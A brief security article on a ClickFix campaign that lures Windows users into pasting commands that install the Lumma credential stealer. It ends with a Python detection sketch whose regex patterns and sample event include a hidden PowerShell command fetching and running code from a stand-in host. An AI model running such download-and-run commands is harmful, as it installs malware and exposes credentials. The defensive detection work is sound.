New wave of ClickFix attacks

A new ClickFix campaign is targeting Windows users, tricking them into self-compromising via Windows Terminal. Cybercriminals have refined their techniques, exploiting users' familiarity with copy-paste operations to inject malicious code directly into their systems.

How the scam works

The scam relies on social engineering: users are tricked into opening Windows Terminal and pasting malicious commands into it. Once executed, these commands allow the installation of malware, specifically the Lumma credential stealer, which aims to steal sensitive information from browsers.

Security implications

This type of attack highlights the need for greater user awareness of the risks of copying and pasting unknown commands, especially from unverified sources. The ease with which this technique can be exploited underscores the importance of adopting robust security measures and always verifying the origin of code before executing it.
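
One way to turn the Windows Terminal detail into a detection check is sketched below, as an added example that is not part of the original article. It flags process-creation events whose ancestry includes WindowsTerminal.exe and whose command line shows at least two download-and-run traits. The event fields, sample events and trait patterns are assumptions, since the article does not list the commands used in this campaign.

```python
import re

# Assumption: generic traits of download-and-run one-liners, not campaign IoCs.
TRAITS = {
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?\b"),
    "web_download": re.compile(
        r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|downloadstring)\b"),
    "inline_exec": re.compile(r"(?i)\b(iex|invoke-expression|mshta|rundll32)\b"),
}
TERMINAL = "windowsterminal.exe"

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid):
    """Yield parent events upward; 'seen' stops loops caused by PID reuse."""
    seen, pid = set(), event["ppid"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid]["ppid"]

def find_terminal_paste_execution(events):
    """Return (pid, matched_traits) for suspicious processes under the terminal."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not any(basename(a["image"]) == TERMINAL for a in ancestors(e, by_pid)):
            continue
        hits = sorted(n for n, rx in TRAITS.items() if rx.search(e["cmdline"]))
        if len(hits) >= 2:  # require two traits to spare ordinary admin use
            alerts.append((e["pid"], hits))
    return alerts

# Constructed sample events (field names are hypothetical, modelled on
# process-creation telemetry); example.invalid is a reserved test domain.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BAD = 'powershell.exe -w hidden -c "iwr https://example.invalid/stage | iex"'
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Apps\WindowsTerminal.exe", "cmdline": "wt.exe"},
    {"pid": 300, "ppid": 200, "image": PS, "cmdline": "powershell.exe"},
    {"pid": 400, "ppid": 300, "image": PS, "cmdline": BAD},
    {"pid": 500, "ppid": 300, "image": r"C:\Git\git.exe", "cmdline": "git status"},
    {"pid": 600, "ppid": 100, "image": PS, "cmdline": BAD},  # no terminal ancestor
]

if __name__ == "__main__":
    for pid, hits in find_terminal_paste_execution(EVENTS):
        print(f"ALERT pid={pid} traits={','.join(hits)}")
```

Only PID 400 is reported; PID 600 runs the same command line but has no Windows Terminal ancestor, so it falls outside this terminal-specific check.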